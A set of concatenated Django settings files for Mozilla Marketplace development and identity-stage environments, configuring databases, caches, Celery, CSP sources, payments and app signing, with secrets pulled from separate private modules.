# bundle to see which APIs and features were removed from jQuery core.
MINIFY_BUNDLES['js'].update(asset_bundles.jquery_migrated())
MONOLITH_PASSWORD = private_mkt.MONOLITH_PASSWORD
# This is mainly for Marionette tests.
WEBAPP_MANIFEST_NAME = 'Marketplace Dev'
# Replace LESS with Stylus.
try:
MINIFY_BUNDLES['css'].update(asset_bundles.less2stylus())
except AttributeError:
pass
ENABLE_API_ERROR_SERVICE = True
# Until Bango can properly do refunds.
BANGO_FAKE_REFUNDS = True
if NEWRELIC_ENABLE:
NEWRELIC_INI = '/etc/newrelic.d/marketplace-altdev.allizom.org.ini'
ES_USE_PLUGINS = True
# Cache timeout on the /search/featured API.
CACHE_SEARCH_FEATURED_API_TIMEOUT = 60 * 5 # 5 min.
WHITELISTED_CLIENTS_EMAIL_API = private_mkt.WHITELISTED_CLIENTS_EMAIL_API
POSTFIX_AUTH_TOKEN = private_mkt.POSTFIX_AUTH_TOKEN
POSTFIX_DOMAIN = 'marketplace-dev.allizom.org'
MONOLITH_INDEX = 'mktdev-time_*'
# IARC content ratings.
IARC_ENV = 'test'
IARC_MOCK = False
IARC_PASSWORD = private_mkt.IARC_PASSWORD
IARC_PLATFORM = 'Firefox'
IARC_SERVICE_ENDPOINT = 'https://www.globalratings.com/IARCDEMOService/IARCServices.svc'
IARC_STOREFRONT_ID = 4
IARC_SUBMISSION_ENDPOINT = 'https://www.globalratings.com/IARCDEMORating/Submission.aspx'
IARC_ALLOW_CERT_REUSE = True
# We'll use zippy, the reference implementation on -dev.
PAYMENT_PROVIDERS = ['reference']
PRE_GENERATE_APK_URL = 'http://dapk.net/application.apk'
########NEW FILE########
__FILENAME__ = settings_base
"""private_base will be populated from puppet and placed in this directory"""
import logging
import os
import dj_database_url
from lib.settings_base import (ALLOWED_HOSTS, CACHE_PREFIX, ES_INDEXES,
KNOWN_PROXIES, LOGGING, HOSTNAME)
from .. import splitstrip
import private_base as private
ALLOWED_HOSTS += ['.mozflare.net']
ENGAGE_ROBOTS = False
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = private.EMAIL_HOST
DEBUG = False
TEMPLATE_DEBUG = DEBUG
DEBUG_PROPAGATE_EXCEPTIONS = False
SESSION_COOKIE_SECURE = True
REDIRECT_SECRET_KEY = private.REDIRECT_SECRET_KEY
ADMINS = ()
DATABASES = {}
DATABASES['default'] = dj_database_url.parse(private.DATABASES_DEFAULT_URL)
DATABASES['default']['ENGINE'] = 'mysql_pool'
DATABASES['default']['OPTIONS'] = {'init_command': 'SET storage_engine=InnoDB'}
DATABASES['slave'] = dj_database_url.parse(private.DATABASES_SLAVE_URL)
DATABASES['slave']['ENGINE'] = 'mysql_pool'
DATABASES['slave']['OPTIONS'] = {'init_command': 'SET storage_engine=InnoDB'}
DATABASES['slave']['sa_pool_key'] = 'slave'
DATABASE_POOL_ARGS = {
'max_overflow': 10,
'pool_size': 5,
'recycle': 30
}
SERVICES_DATABASE = dj_database_url.parse(private.SERVICES_DATABASE_URL)
SLAVE_DATABASES = ['slave']
CACHES = {
'default': {
'BACKEND': 'caching.backends.memcached.MemcachedCache',
'LOCATION': splitstrip(private.CACHES_DEFAULT_LOCATION),
'TIMEOUT': 500,
'KEY_PREFIX': CACHE_PREFIX,
}
}
SECRET_KEY = private.SECRET_KEY
LOG_LEVEL = logging.DEBUG
## Celery
BROKER_URL = private.BROKER_URL
CELERY_IGNORE_RESULT = True
CELERY_DISABLE_RATE_LIMITS = True
CELERYD_PREFETCH_MULTIPLIER = 1
NETAPP_STORAGE = private.NETAPP_STORAGE_ROOT + '/shared_storage'
MIRROR_STAGE_PATH = private.NETAPP_STORAGE_ROOT + '/public-staging'
GUARDED_ADDONS_PATH = private.NETAPP_STORAGE_ROOT + '/guarded-addons'
UPLOADS_PATH = NETAPP_STORAGE + '/uploads'
USERPICS_PATH = UPLOADS_PATH + '/userpics'
ADDON_ICONS_PATH = UPLOADS_PATH + '/addon_icons'
COLLECTIONS_ICON_PATH = UPLOADS_PATH + '/collection_icons'
IMAGEASSETS_PATH = UPLOADS_PATH + '/imageassets'
REVIEWER_ATTACHMENTS_PATH = UPLOADS_PATH + '/reviewer_attachment'
PREVIEWS_PATH = UPLOADS_PATH + '/previews'
SIGNED_APPS_PATH = NETAPP_STORAGE + '/signed_apps'
SIGNED_APPS_REVIEWER_PATH = NETAPP_STORAGE + '/signed_apps_reviewer'
PREVIEW_THUMBNAIL_PATH = PREVIEWS_PATH + '/thumbs/%s/%d.png'
PREVIEW_FULL_PATH = PREVIEWS_PATH + '/full/%s/%d.%s'
HERA = []
LOGGING['loggers'].update({
'amqp': {'level': logging.WARNING},
'raven': {'level': logging.WARNING},
'requests': {'level': logging.WARNING},
'z.addons': {'level': logging.DEBUG},
'z.task': {'level': logging.DEBUG},
'z.hera': {'level': logging.INFO},
'z.redis': {'level': logging.DEBUG},
'z.pool': {'level': logging.ERROR},
})
REDIS_BACKEND = private.REDIS_BACKENDS_CACHE
REDIS_BACKENDS = {
'cache': private.REDIS_BACKENDS_CACHE,
'cache_slave': private.REDIS_BACKENDS_CACHE_SLAVE,
'master': private.REDIS_BACKENDS_MASTER,
'slave': private.REDIS_BACKENDS_SLAVE,
}
CACHE_MACHINE_USE_REDIS = True
RECAPTCHA_PUBLIC_KEY = private.RECAPTCHA_PUBLIC_KEY
RECAPTCHA_PRIVATE_KEY = private.RECAPTCHA_PRIVATE_KEY
RECAPTCHA_URL = ('https://www.google.com/recaptcha/api/challenge?k=%s' %
RECAPTCHA_PUBLIC_KEY)
TMP_PATH = os.path.join(NETAPP_STORAGE, 'tmp')
ADDONS_PATH = private.NETAPP_STORAGE_ROOT + '/files'
SPIDERMONKEY = '/usr/bin/tracemonkey'
# Remove DetectMobileMiddleware from middleware in production.
detect = 'mobility.middleware.DetectMobileMiddleware'
csp = 'csp.middleware.CSPMiddleware'
RESPONSYS_ID = private.RESPONSYS_ID
CRONJOB_LOCK_PREFIX = 'mkt-dev'
BUILDER_SECRET_KEY = private.BUILDER_SECRET_KEY
BUILDER_VERSIONS_URL = "https://builder-addons-dev.allizom.org/repackage/sdk-versions/"
ES_HOSTS = splitstrip(private.ES_HOSTS)
ES_URLS = ['http://%s' % h for h in ES_HOSTS]
ES_INDEXES = dict((k, '%s_dev' % v) for k, v in ES_INDEXES.items())
BUILDER_UPGRADE_URL = "https://builder-addons-dev.allizom.org/repackage/rebuild/"
STATSD_HOST = private.STATSD_HOST
STATSD_PORT = private.STATSD_PORT
STATSD_PREFIX = private.STATSD_PREFIX
GRAPHITE_HOST = private.GRAPHITE_HOST
GRAPHITE_PORT = private.GRAPHITE_PORT
GRAPHITE_PREFIX = private.GRAPHITE_PREFIX
CEF_PRODUCT = STATSD_PREFIX
ES_TIMEOUT = 60
EXPOSE_VALIDATOR_TRACEBACKS = True
KNOWN_PROXIES += ['10.2.83.105',
'10.2.83.106',
'10.2.83.107',
'10.8.83.200',
'10.8.83.201',
'10.8.83.202',
'10.8.83.203',
'10.8.83.204',
'10.8.83.210',
'10.8.83.211',
'10.8.83.212',
'10.8.83.213',
'10.8.83.214',
'10.8.83.215',
'10.8.83.251',
'10.8.83.252',
'10.8.83.253',
]
NEW_FEATURES = True
REDIRECT_URL = 'https://outgoing-mkt-dev.allizom.org/v1/'
CLEANCSS_BIN = 'cleancss'
UGLIFY_BIN = 'uglifyjs'
CELERYD_TASK_SOFT_TIME_LIMIT = 240
LESS_PREPROCESS = True
XSENDFILE_HEADER = 'X-Accel-Redirect'
ALLOW_SELF_REVIEWS = True
GOOGLE_ANALYTICS_CREDENTIALS = private.GOOGLE_ANALYTICS_CREDENTIALS
GOOGLE_API_CREDENTIALS = private.GOOGLE_API_CREDENTIALS
MONOLITH_SERVER = 'https://monolith-dev.allizom.org'
GEOIP_URL = 'https://geo-dev-marketplace.allizom.org'
AWS_ACCESS_KEY_ID = private.AWS_ACCESS_KEY_ID
AWS_SECRET_ACCESS_KEY = private.AWS_SECRET_ACCESS_KEY
AWS_STORAGE_BUCKET_NAME = private.AWS_STORAGE_BUCKET_NAME
RAISE_ON_SIGNAL_ERROR = True
API_THROTTLE = False
NEWRELIC_WHITELIST = ['dev1.addons.phx1.mozilla.com',
'dev2.addons.phx1.mozilla.com']
NEWRELIC_ENABLE = HOSTNAME in NEWRELIC_WHITELIST
AES_KEYS = private.AES_KEYS
########NEW FILE########
__FILENAME__ = settings_mkt
"""private_mkt will be populated from puppet and placed in this directory"""
from lib.settings_base import *
from mkt.settings import *
from settings_base import *
import private_mkt
DOMAIN = 'marketplace-dev.allizom.org'
SERVER_EMAIL = '[email protected]'
SITE_URL = 'https://marketplace-dev.allizom.org'
SERVICES_URL = SITE_URL
#STATIC_URL = os.getenv('CUSTOM_CDN', 'https://marketplace-dev-cdn.allizom.org/')
STATIC_URL = os.getenv('CUSTOM_CDN', 'https://marketplace-dev.mozflare.net/')
LOCAL_MIRROR_URL = '%s_files' % STATIC_URL
MIRROR_URL = LOCAL_MIRROR_URL
CSP_STATIC_URL = STATIC_URL[:-1]
CSP_IMG_SRC = CSP_IMG_SRC + (CSP_STATIC_URL,)
CSP_SCRIPT_SRC = CSP_SCRIPT_SRC + (CSP_STATIC_URL,)
CSP_STYLE_SRC = CSP_STYLE_SRC + (CSP_STATIC_URL,)
CSP_FONT_SRC = CSP_FONT_SRC + (CSP_STATIC_URL,)
ADDON_ICON_URL = "%s/%s/%s/images/addon_icon/%%d-%%d.png?modified=%%s" % (
STATIC_URL, LANGUAGE_CODE, DEFAULT_APP)
ADDON_ICON_URL = STATIC_URL + 'img/uploads/addon_icons/%s/%s-%s.png?modified=%s'
PREVIEW_THUMBNAIL_URL = (STATIC_URL +
'img/uploads/previews/thumbs/%s/%d.png?modified=%d')
PREVIEW_FULL_URL = (STATIC_URL +
'img/uploads/previews/full/%s/%d.%s?modified=%d')
# paths for uploaded extensions
FILES_URL = STATIC_URL + "%s/%s/downloads/file/%d/%s?src=%s"
SESSION_COOKIE_DOMAIN = ".%s" % DOMAIN
# paths for uploaded extensions
USERPICS_URL = STATIC_URL + 'img/uploads/userpics/%s/%s/%s.png?modified=%d'
COLLECTION_ICON_URL = STATIC_URL + '/img/uploads/collection_icons/%s/%s.png?m=%s'
MEDIA_URL = STATIC_URL + 'media/'
ADDON_ICONS_DEFAULT_URL = MEDIA_URL + 'img/hub'
ADDON_ICON_BASE_URL = MEDIA_URL + 'img/icons/'
PRODUCT_ICON_URL = STATIC_URL + 'product-icons'
CACHE_PREFIX = 'dev.mkt.%s' % CACHE_PREFIX
CACHE_MIDDLEWARE_KEY_PREFIX = CACHE_PREFIX
CACHES['default']['KEY_PREFIX'] = CACHE_PREFIX
SYSLOG_TAG = "http_app_addons_marketplacedev"
SYSLOG_TAG2 = "http_app_addons_marketplacedev_timer"
SYSLOG_CSP = "http_app_addons_marketplacedev_csp"
STATSD_PREFIX = 'marketplace-dev'
# Redis
REDIS_BACKEND = getattr(private_mkt, 'REDIS_BACKENDS_CACHE', private.REDIS_BACKENDS_CACHE)
REDIS_BACKENDS_CACHE_SLAVE = getattr(private_mkt, 'REDIS_BACKENDS_CACHE_SLAVE', private.REDIS_BACKENDS_CACHE_SLAVE)
REDIS_BACKENDS_MASTER = getattr(private_mkt, 'REDIS_BACKENDS_MASTER', private.REDIS_BACKENDS_MASTER)
REDIS_BACKENDS_SLAVE = getattr(private_mkt, 'REDIS_BACKENDS_SLAVE', private.REDIS_BACKENDS_SLAVE)
REDIS_BACKENDS = {
'cache': REDIS_BACKEND,
'cache_slave': REDIS_BACKENDS_CACHE_SLAVE,
'master': REDIS_BACKENDS_MASTER,
'slave': REDIS_BACKENDS_SLAVE,
}
## Celery
BROKER_URL = private_mkt.BROKER_URL
CELERY_IGNORE_RESULT = True
CELERY_DISABLE_RATE_LIMITS = True
CELERYD_PREFETCH_MULTIPLIER = 1
WEBAPPS_RECEIPT_KEY = private_mkt.WEBAPPS_RECEIPT_KEY
WEBAPPS_RECEIPT_URL = private_mkt.WEBAPPS_RECEIPT_URL
APP_PREVIEW = True
WEBAPPS_UNIQUE_BY_DOMAIN = False
SENTRY_DSN = private_mkt.SENTRY_DSN
WEBAPPS_PUBLIC_KEY_DIRECTORY = NETAPP_STORAGE + '/public_keys'
PRODUCT_ICON_PATH = NETAPP_STORAGE + '/product-icons'
DUMPED_APPS_PATH = NETAPP_STORAGE + '/dumped-apps'
DUMPED_USERS_PATH = NETAPP_STORAGE + '/dumped-users'
SOLITUDE_HOSTS = ('https://payments-dev.allizom.org',)
SOLITUDE_OAUTH = {'key': private_mkt.SOLITUDE_OAUTH_KEY,
'secret': private_mkt.SOLITUDE_OAUTH_SECRET}
VALIDATOR_IAF_URLS = ['https://marketplace.firefox.com',
'https://marketplace.allizom.org',
'https://marketplace-dev.allizom.org']
# Override the limited marketplace ones with these ones from AMO. Because
# the base gets overridden in the mkt.settings file, we'll set them back again.
# Note the addition of dbg here.
AMO_LANGUAGES = (
'af', 'ar', 'bg', 'ca', 'cs', 'da', 'de', 'el', 'en-US', 'es', 'eu', 'fa',
'fi', 'fr', 'ga-IE', 'he', 'hu', 'id', 'it', 'ja', 'ko', 'mn', 'nl', 'pl',
'pt-BR', 'pt-PT', 'ro', 'ru', 'sk', 'sl', 'sq', 'sr', 'sr-Latn', 'sv-SE',
'tr', 'uk', 'vi', 'zh-CN', 'zh-TW', 'dbg'
)
LANGUAGES = lazy(lazy_langs, dict)(AMO_LANGUAGES)
LANGUAGE_URL_MAP = dict([(i.lower(), i) for i in AMO_LANGUAGES])
HIDDEN_LANGUAGES = (
'cy',
)
BLUEVIA_SECRET = private_mkt.BLUEVIA_SECRET
#Bug 748403
SIGNING_SERVER = private_mkt.SIGNING_SERVER
SIGNING_SERVER_ACTIVE = True
SIGNING_VALID_ISSUERS = ['marketplace-dev-cdn.allizom.org']
#Bug 793876
SIGNED_APPS_KEY = private_mkt.SIGNED_APPS_KEY
SIGNED_APPS_SERVER_ACTIVE = True
SIGNED_APPS_SERVER = private_mkt.SIGNED_APPS_SERVER
SIGNED_APPS_REVIEWER_SERVER_ACTIVE = True
SIGNED_APPS_REVIEWER_SERVER = private_mkt.SIGNED_APPS_REVIEWER_SERVER
HEKA_CONF = {
'plugins': {'cef': ('heka_cef.cef_plugin:config_plugin', {
'syslog_facility': 'LOCAL4',
# CEF_PRODUCT is defined in settings_base
'syslog_ident': CEF_PRODUCT,
'syslog_priority': 'INFO'
}),
},
'stream': {
'class': 'heka.streams.UdpStream',
'host': splitstrip(private.HEKA_CONF_SENDER_HOST),
'port': private.HEKA_CONF_SENDER_PORT,
},
'logger': 'addons-marketplace-dev',
}
HEKA = client_from_dict_config(HEKA_CONF)
USE_HEKA_FOR_CEF = True
GOOGLE_ANALYTICS_DOMAIN = 'marketplace.firefox.com'
# Pass through the DSN to the Raven client and force signal
# registration so that exceptions are passed through to sentry
#RAVEN_CONFIG = {'dsn': SENTRY_DSN, 'register_signals': True}
# See mkt/settings.py for more info.
APP_PURCHASE_KEY = DOMAIN
APP_PURCHASE_AUD = DOMAIN
APP_PURCHASE_TYP = 'mozilla-dev/payments/pay/v1'
APP_PURCHASE_SECRET = private_mkt.APP_PURCHASE_SECRET
# We upgraded to jQuery 1.9.1. Run this command to include jquery-migrate in the JS
# bundle to see which APIs and features were removed from jQuery core.
MINIFY_BUNDLES['js'].update(asset_bundles.jquery_migrated())
MONOLITH_PASSWORD = private_mkt.MONOLITH_PASSWORD
# This is mainly for Marionette tests.
WEBAPP_MANIFEST_NAME = 'Marketplace Dev'
# Replace LESS with Stylus.
try:
MINIFY_BUNDLES['css'].update(asset_bundles.less2stylus())
except AttributeError:
pass
ENABLE_API_ERROR_SERVICE = True
# Until Bango can properly do refunds.
BANGO_FAKE_REFUNDS = True
if NEWRELIC_ENABLE:
NEWRELIC_INI = '/etc/newrelic.d/marketplace-dev.allizom.org.ini'
ES_USE_PLUGINS = True
# Cache timeout on the /search/featured API.
CACHE_SEARCH_FEATURED_API_TIMEOUT = 60 * 5 # 5 min.
WHITELISTED_CLIENTS_EMAIL_API = private_mkt.WHITELISTED_CLIENTS_EMAIL_API
POSTFIX_AUTH_TOKEN = private_mkt.POSTFIX_AUTH_TOKEN
POSTFIX_DOMAIN = DOMAIN
MONOLITH_INDEX = 'mktdev-time_*'
# IARC content ratings.
IARC_ENV = 'test'
IARC_MOCK = False
IARC_PASSWORD = private_mkt.IARC_PASSWORD
IARC_PLATFORM = 'Firefox'
IARC_SERVICE_ENDPOINT = 'https://www.globalratings.com/IARCDEMOService/IARCServices.svc'
IARC_STOREFRONT_ID = 4
IARC_SUBMISSION_ENDPOINT = 'https://www.globalratings.com/IARCDEMORating/Submission.aspx'
IARC_ALLOW_CERT_REUSE = True
# We'll use zippy, the reference implementation on -dev.
PAYMENT_PROVIDERS = ['reference']
# Since Bango won't actually work on -dev anyway, may as well make it the
# reference implementation anyway.
DEFAULT_PAYMENT_PROVIDER = 'reference'
PRE_GENERATE_APKS = True
PRE_GENERATE_APK_URL = 'http://dapk.net/application.apk'
########NEW FILE########
__FILENAME__ = settings_base
"""private_base will be populated from puppet and placed in this directory"""
import logging
import os
import dj_database_url
from lib.settings_base import (ALLOWED_HOSTS, CACHE_PREFIX,
CSP_SCRIPT_SRC, CSP_FRAME_SRC, ES_INDEXES,
KNOWN_PROXIES, LOGGING, HOSTNAME)
from .. import splitstrip
import private_base as private
ENGAGE_ROBOTS = False
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = private.EMAIL_HOST
DEBUG = False
TEMPLATE_DEBUG = DEBUG
DEBUG_PROPAGATE_EXCEPTIONS = False
SESSION_COOKIE_SECURE = True
REDIRECT_SECRET_KEY = private.REDIRECT_SECRET_KEY
ADMINS = ()
DATABASES = {}
DATABASES['default'] = dj_database_url.parse(private.DATABASES_DEFAULT_URL)
DATABASES['default']['ENGINE'] = 'mysql_pool'
DATABASES['default']['OPTIONS'] = {'init_command': 'SET storage_engine=InnoDB'}
DATABASES['slave'] = dj_database_url.parse(private.DATABASES_SLAVE_URL)
DATABASES['slave']['ENGINE'] = 'mysql_pool'
DATABASES['slave']['OPTIONS'] = {'init_command': 'SET storage_engine=InnoDB'}
SERVICES_DATABASE = dj_database_url.parse(private.SERVICES_DATABASE_URL)
DATABASE_POOL_ARGS = {
'max_overflow': 10,
'pool_size': 5,
'recycle': 30
}
SLAVE_DATABASES = ['slave']
CACHES = {
'default': {
'BACKEND': 'caching.backends.memcached.MemcachedCache',
'LOCATION': splitstrip(private.CACHES_DEFAULT_LOCATION),
'TIMEOUT': 500,
'KEY_PREFIX': CACHE_PREFIX,
},
}
SECRET_KEY = private.SECRET_KEY
LOG_LEVEL = logging.DEBUG
## Celery
BROKER_URL = private.BROKER_URL
CELERY_IGNORE_RESULT = True
CELERY_DISABLE_RATE_LIMITS = True
CELERYD_PREFETCH_MULTIPLIER = 1
NETAPP_STORAGE = private.NETAPP_STORAGE_ROOT + '/shared_storage'
MIRROR_STAGE_PATH = private.NETAPP_STORAGE_ROOT + '/public-staging'
GUARDED_ADDONS_PATH = private.NETAPP_STORAGE_ROOT + '/guarded-addons'
UPLOADS_PATH = NETAPP_STORAGE + '/uploads'
USERPICS_PATH = UPLOADS_PATH + '/userpics'
ADDON_ICONS_PATH = UPLOADS_PATH + '/addon_icons'
COLLECTIONS_ICON_PATH = UPLOADS_PATH + '/collection_icons'
IMAGEASSETS_PATH = UPLOADS_PATH + '/imageassets'
REVIEWER_ATTACHMENTS_PATH = UPLOADS_PATH + '/reviewer_attachment'
PREVIEWS_PATH = UPLOADS_PATH + '/previews'
SIGNED_APPS_PATH = NETAPP_STORAGE + '/signed_apps'
SIGNED_APPS_REVIEWER_PATH = NETAPP_STORAGE + '/signed_apps_reviewer'
PREVIEW_THUMBNAIL_PATH = PREVIEWS_PATH + '/thumbs/%s/%d.png'
PREVIEW_FULL_PATH = PREVIEWS_PATH + '/full/%s/%d.%s'
HERA = []
LOGGING['loggers'].update({
'z.task': {'level': logging.DEBUG},
'z.hera': {'level': logging.INFO},
'z.redis': {'level': logging.DEBUG},
'z.pool': {'level': logging.ERROR},
})
REDIS_BACKEND = private.REDIS_BACKENDS_CACHE
REDIS_BACKENDS = {
'cache': private.REDIS_BACKENDS_CACHE,
'cache_slave': private.REDIS_BACKENDS_CACHE_SLAVE,
'master': private.REDIS_BACKENDS_MASTER,
'slave': private.REDIS_BACKENDS_SLAVE,
}
CACHE_MACHINE_USE_REDIS = True
RECAPTCHA_PUBLIC_KEY = private.RECAPTCHA_PUBLIC_KEY
RECAPTCHA_PRIVATE_KEY = private.RECAPTCHA_PRIVATE_KEY
RECAPTCHA_URL = ('https://www.google.com/recaptcha/api/challenge?k=%s' % RECAPTCHA_PUBLIC_KEY)
TMP_PATH = os.path.join(NETAPP_STORAGE, 'tmp')
ADDONS_PATH = private.NETAPP_STORAGE_ROOT + '/files'
SPIDERMONKEY = '/usr/bin/tracemonkey'
# Remove DetectMobileMiddleware from middleware in production.
detect = 'mobility.middleware.DetectMobileMiddleware'
csp = 'csp.middleware.CSPMiddleware'
RESPONSYS_ID = private.RESPONSYS_ID
CRONJOB_LOCK_PREFIX = 'marketplace-identity-stage'
BUILDER_SECRET_KEY = private.BUILDER_SECRET_KEY
BUILDER_VERSIONS_URL = "https://builder-addons.allizom.org/repackage/sdk-versions/"
ES_HOSTS = splitstrip(private.ES_HOSTS)
ES_URLS = ['http://%s' % h for h in ES_HOSTS]
ES_INDEXES = dict((k, '%s_identity_stage' % v) for k, v in ES_INDEXES.items())
BUILDER_UPGRADE_URL = "https://builder-addons.allizom.org/repackage/rebuild/"
STATSD_HOST = private.STATSD_HOST
STATSD_PORT = private.STATSD_PORT
STATSD_PREFIX = private.STATSD_PREFIX
GRAPHITE_HOST = private.GRAPHITE_HOST
GRAPHITE_PORT = private.GRAPHITE_PORT
GRAPHITE_PREFIX = private.GRAPHITE_PREFIX
CEF_PRODUCT = STATSD_PREFIX
ES_TIMEOUT = 60
EXPOSE_VALIDATOR_TRACEBACKS = True
KNOWN_PROXIES += ['10.2.83.105',
'10.2.83.106',
'10.2.83.107',
'10.8.83.200',
'10.8.83.201',
'10.8.83.202',
'10.8.83.203',
'10.8.83.204',
'10.8.83.210',
'10.8.83.211',
'10.8.83.212',
'10.8.83.213',
'10.8.83.214',
'10.8.83.215',
'10.8.83.251',
'10.8.83.252',
'10.8.83.253',
]
NEW_FEATURES = True
REDIRECT_URL = 'https://outgoing.allizom.org/v1/'
CLEANCSS_BIN = 'cleancss'
UGLIFY_BIN = 'uglifyjs'
CELERYD_TASK_SOFT_TIME_LIMIT = 240
LESS_PREPROCESS = True
XSENDFILE_HEADER = 'X-Accel-Redirect'
ALLOW_SELF_REVIEWS = True
MONOLITH_SERVER = 'https://monolith.allizom.org'
GEOIP_URL = 'http://geo.marketplace.allizom.org'
API_THROTTLE = False
CSP_SCRIPT_SRC = CSP_SCRIPT_SRC + ("https://firefoxos.anosrep.org",)
CSP_FRAME_SRC = CSP_FRAME_SRC + ("https://firefoxos.anosrep.org",)
AES_KEYS = private.AES_KEYS
########NEW FILE########
__FILENAME__ = settings_mkt
"""private_mkt will be populated from puppet and placed in this directory"""
from lib.settings_base import *
from mkt.settings import *
from settings_base import *
import private_mkt
DOMAIN = 'identity-stage-marketplace.allizom.org'
SERVER_EMAIL = '[email protected]'
SITE_URL = 'https://identity-stage-marketplace.allizom.org'
SERVICES_URL = SITE_URL
STATIC_URL = 'https://identity-stage-marketplace-cdn.allizom.org/'
LOCAL_MIRROR_URL = '%s_files' % STATIC_URL
MIRROR_URL = LOCAL_MIRROR_URL
CSP_STATIC_URL = STATIC_URL[:-1]
CSP_IMG_SRC = CSP_IMG_SRC + (CSP_STATIC_URL,)
CSP_SCRIPT_SRC = CSP_SCRIPT_SRC + (CSP_STATIC_URL,)
CSP_STYLE_SRC = CSP_STYLE_SRC + (CSP_STATIC_URL,)
BROWSERID_DOMAIN = 'login.anosrep.org'
BROWSERID_VERIFICATION_URL = 'https://verifier.login.anosrep.org/verify'
BROWSERID_JS_URL = 'https://login.anosrep.org/include.js'
NATIVE_BROWSERID_DOMAIN = 'firefoxos.anosrep.org'
UNVERIFIED_ISSUER = 'firefoxos.anosrep.org'
# This is a B2G (or other native) verifier. Adjust accordingly.
NATIVE_BROWSERID_VERIFICATION_URL = ('https://%s/verify'
% NATIVE_BROWSERID_DOMAIN)
NATIVE_BROWSERID_JS_URL = ('https://%s/include.js'
% NATIVE_BROWSERID_DOMAIN)
ADDON_ICON_URL = "%s/%s/%s/images/addon_icon/%%d-%%d.png?modified=%%s" % (STATIC_URL, LANGUAGE_CODE, DEFAULT_APP)
ADDON_ICON_URL = STATIC_URL + 'img/uploads/addon_icons/%s/%s-%s.png?modified=%s'
PREVIEW_THUMBNAIL_URL = (STATIC_URL +
'img/uploads/previews/thumbs/%s/%d.png?modified=%d')
PREVIEW_FULL_URL = (STATIC_URL +
'img/uploads/previews/full/%s/%d.%s?modified=%d')
# paths for uploaded extensions
FILES_URL = STATIC_URL + "%s/%s/downloads/file/%d/%s?src=%s"
SESSION_COOKIE_DOMAIN = ".%s" % DOMAIN
# paths for uploaded extensions
USERPICS_URL = STATIC_URL + 'img/uploads/userpics/%s/%s/%s.png?modified=%d'
COLLECTION_ICON_URL = STATIC_URL + '/img/uploads/collection_icons/%s/%s.png?m=%s'
MEDIA_URL = STATIC_URL + 'media/'
ADDON_ICONS_DEFAULT_URL = MEDIA_URL + 'img/hub'
ADDON_ICON_BASE_URL = MEDIA_URL + 'img/icons/'
PRODUCT_ICON_URL = STATIC_URL + 'product-icons'
CACHE_PREFIX = 'identity.stage.mkt.%s' % CACHE_PREFIX
CACHE_MIDDLEWARE_KEY_PREFIX = CACHE_PREFIX
CACHES['default']['KEY_PREFIX'] = CACHE_PREFIX
LOG_LEVEL = logging.DEBUG
# The django statsd client to use, see django-statsd for more.
SYSLOG_TAG = "http_app_marketplace_identity_stage"
SYSLOG_TAG2 = "http_app_marketplace_identity_stage_timer"
SYSLOG_CSP = "http_app_marketplace_identity_stage_csp"
STATSD_PREFIX = 'marketplace-identity-stage'
## Celery
BROKER_URL = private_mkt.BROKER_URL
CELERY_IGNORE_RESULT = True
CELERY_DISABLE_RATE_LIMITS = True
CELERYD_PREFETCH_MULTIPLIER = 1
WEBAPPS_RECEIPT_KEY = private_mkt.WEBAPPS_RECEIPT_KEY
WEBAPPS_RECEIPT_URL = private_mkt.WEBAPPS_RECEIPT_URL
APP_PREVIEW = True
WEBAPPS_UNIQUE_BY_DOMAIN = True
SENTRY_DSN = private_mkt.SENTRY_DSN
SOLITUDE_HOSTS = ('https://payments.allizom.org',)
SOLITUDE_OAUTH = {'key': private_mkt.SOLITUDE_OAUTH_KEY,
'secret': private_mkt.SOLITUDE_OAUTH_SECRET}
WEBAPPS_PUBLIC_KEY_DIRECTORY = NETAPP_STORAGE + '/public_keys'
PRODUCT_ICON_PATH = NETAPP_STORAGE + '/product-icons'
DUMPED_APPS_PATH = NETAPP_STORAGE + '/dumped-apps'
DUMPED_USERS_PATH = NETAPP_STORAGE + '/dumped-users'
GOOGLE_ANALYTICS_DOMAIN = 'marketplace.firefox.com'
VALIDATOR_IAF_URLS = ['https://marketplace.firefox.com',
'https://marketplace.allizom.org',
'https://identity-stage-marketplace.allizom.org',
'https://marketplace-dev.allizom.org',
'https://marketplace-altdev.allizom.org']
if getattr(private_mkt, 'LOAD_TESTING', False):
# mock the authentication and use django_fakeauth for this
AUTHENTICATION_BACKENDS = ('django_fakeauth.FakeAuthBackend',)\
+ AUTHENTICATION_BACKENDS
MIDDLEWARE_CLASSES.insert(
MIDDLEWARE_CLASSES.index('access.middleware.ACLMiddleware'),
'django_fakeauth.FakeAuthMiddleware')
FAKEAUTH_TOKEN = private_mkt.FAKEAUTH_TOKEN
# we are also creating access tokens for OAuth, here are the keys and
# secrets used for them
API_PASSWORD = getattr(private_mkt, 'API_PASSWORD', FAKEAUTH_TOKEN)
AMO_LANGUAGES = AMO_LANGUAGES + ('dbg',)
LANGUAGES = lazy(lazy_langs, dict)(AMO_LANGUAGES)
LANGUAGE_URL_MAP = dict([(i.lower(), i) for i in AMO_LANGUAGES])
BLUEVIA_SECRET = private_mkt.BLUEVIA_SECRET
#Bug 748403
SIGNING_SERVER = private_mkt.SIGNING_SERVER
SIGNING_SERVER_ACTIVE = True
SIGNING_VALID_ISSUERS = ['identity-stage-marketplace-cdn.allizom.org']
#Bug 793876
SIGNED_APPS_KEY = private_mkt.SIGNED_APPS_KEY
SIGNED_APPS_SERVER_ACTIVE = True
SIGNED_APPS_SERVER = private_mkt.SIGNED_APPS_SERVER
SIGNED_APPS_REVIEWER_SERVER_ACTIVE = True
SIGNED_APPS_REVIEWER_SERVER = private_mkt.SIGNED_APPS_REVIEWER_SERVER
HEKA_CONF = {
'plugins': {'cef': ('heka_cef.cef_plugin:config_plugin', {
'syslog_facility': 'LOCAL4',
# CEF_PRODUCT is defined in settings_base
'syslog_ident': CEF_PRODUCT,
'syslog_priority': 'INFO'
}),
},
'stream': {
'class': 'heka.streams.UdpStream',
'host': splitstrip(private.HEKA_CONF_SENDER_HOST),
'port': private.HEKA_CONF_SENDER_PORT,
},
'logger': 'marketplace-identity-stage',
}
HEKA = client_from_dict_config(HEKA_CONF)
USE_HEKA_FOR_CEF = True
# See mkt/settings.py for more info.
APP_PURCHASE_KEY = DOMAIN
APP_PURCHASE_AUD = DOMAIN
APP_PURCHASE_TYP = 'mozilla-stage/payments/pay/v1'
APP_PURCHASE_SECRET = private_mkt.APP_PURCHASE_SECRET
